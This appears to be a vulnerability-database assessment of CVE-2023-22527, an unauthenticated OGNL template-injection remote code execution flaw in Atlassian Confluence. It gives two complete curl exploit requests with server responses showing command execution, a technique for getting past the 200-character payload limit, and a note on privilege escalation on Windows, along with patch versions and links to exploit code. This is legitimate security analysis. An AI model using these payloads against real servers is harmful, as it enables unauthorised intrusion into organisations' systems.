Description

A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.

Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

Add Assessment

zeroSteiner (340)

January 24, 2024 7:20pm UTC (9 months ago)•Edited 9 months ago

Ratings

Attacker Value

High

Exploitability

Very High

CISA KEV Listed Common in enterprise Easy to weaponize Unauthenticated Vulnerable in default configuration

Technical Analysis

Overview

A vulnerability exists within Atlassian Confluence which enables a remote and unauthenticated attacker to achieve OS command execution in the context of the application. The vulnerability is due to the text-inline.vm velocity template allowing the label parameter to be passed to an OGNL-sink. By using the technique published by Rahul Maini and Harsh Jaiswal of ProjectDiscovery, an attacker can break out of the sandbox enforced by Struts using the .KEY_velocity.struts2.context value exposed within the request. This was the basis for many of the public PoCs which followed the pattern demonstrated below.

curl --location 'http://localhost:8090/template/aui/text-inline.vm' \
--header 'X-Cmd-In: touch /tmp/cmd_in' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \
--data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \
--data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({"id"}))'

HTTP/1.1 200 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Confluence-Request-Time: 1706122679440
Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) 
X-Accel-Buffering: no
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Wed, 24 Jan 2024 18:57:59 GMT

As noted by ProjectDiscovery in their writeup, however, there is a 200-character limit on the OGNL expressions that are evaluated. In the previous example, this means that the length of the p1 parameter can not exceed 200 characters, meaning the OS command can not exceed 70 characters unless the command results are omitted from the response headers. An additional parameter can also be referenced to bypass this restriction, removing the 200 character limit from the OS command payload. In the following example, the p2 parameter contains the OS command, which is not subject to the 200-character limit and also has fewer character restrictions, making it easier to encode more complex command payloads.

curl -i --location 'http://localhost:8090/template/aui/text-inline.vm' \
--header 'X-Cmd-In: touch /tmp/cmd_in' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--header 'Cookie: JSESSIONID=7EC7F710425BEBB71F71363591CD03BD' \
--data-urlencode 'label=\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.p1,{})+\u0027' \
--data-urlencode 'p1=@org.apache.struts2.ServletActionContext@getResponse().setHeader('\''Cmd-Ret'\'',(new freemarker.template.utility.Execute()).exec({@org.apache.struts2.ServletActionContext@getRequest().getParameter('\''p2'\'')}))' \
--data-urlencode 'p2=sh -c $@|sh . echo id'

HTTP/1.1 200 
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-Confluence-Request-Time: 1706122962559
Cmd-Ret: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence) 
X-Accel-Buffering: no
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Wed, 24 Jan 2024 19:02:42 GMT

This vulnerability also affects Windows systems. When installed on Microsoft Windows, Confluence will by default run as NT AUTHORITY\NETWORK SERVICE. An attacker can easily use namedpipe impersonation to target the RPCSS process to elevate themselves to NT AUTHORITY\SYSTEM. This well-documented privilege escalation technique makes this exploit valuable to attackers when targeting installations on Windows.

Remediation

This vulnerability was patched in version 8.5.4, 8.6.0 and 8.7.1. For complete version information, see CONFSERVER=93833.

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

9.8 Critical

Impact Score:

5.9

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

Vendors

atlassian

Products

confluence data center,
confluence data center 8.7.0,
confluence server

Metasploit Modules

exploit/multi/http/atlassian_confluence_rce_cve_2023_22527 (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb)

Exploited in the Wild

Reported by:

cbeek-r7 indicated source as Threat Feed (https://x.com/TheDFIRReport/status/1749066611678466205?s=20)

Reported: January 21, 2024 3:02pm UTC (9 months ago)

inokii indicated sources as

Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2024/01/24/cisa-adds-one-known-exploited-vulnerability-catalog)

Reported: January 24, 2024 9:36pm UTC (9 months ago)

AttackerKB Worker indicated source as Government or Industry Alert (https://www.cisa.gov/news-events/alerts/2024/01/24/cisa-adds-one-known-exploited-vulnerability-catalog)

Reported: November 08, 2024 8:32am UTC (4 days ago)

References

Canonical

CVE-2023-22527 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22527)

Exploit

PoCs that have not been added by contributors directly have been sourced from: nomi-sec/PoC-in-GitHub.
A PoC added here by the AKB Worker must have at least 2 GitHub stars.

CVE-2023-22527-confluence (https://github.com/VNCERT-CC/CVE-2023-22527-confluence) (Added by AKB Worker)

CVE-2023-22527-POC (https://github.com/Manh130902/CVE-2023-22527-POC) (Added by AKB Worker)

CVE-2023-22527 (https://github.com/Vozec/CVE-2023-22527) (Added by AKB Worker)

Miscellaneous

https://confluence.atlassian.com/pages/viewpage.action?pageId=1333335615

https://jira.atlassian.com/browse/CONFSERVER-93833

http://packetstormsecurity.com/files/176789/Atlassian-Confluence-SSTI-Injection.html

Rapid7

High

CVE-2023-22527

High

Very High

None

None

Network

CVE-2023-22527

Description

Add Assessment

Ratings

Technical Analysis

Overview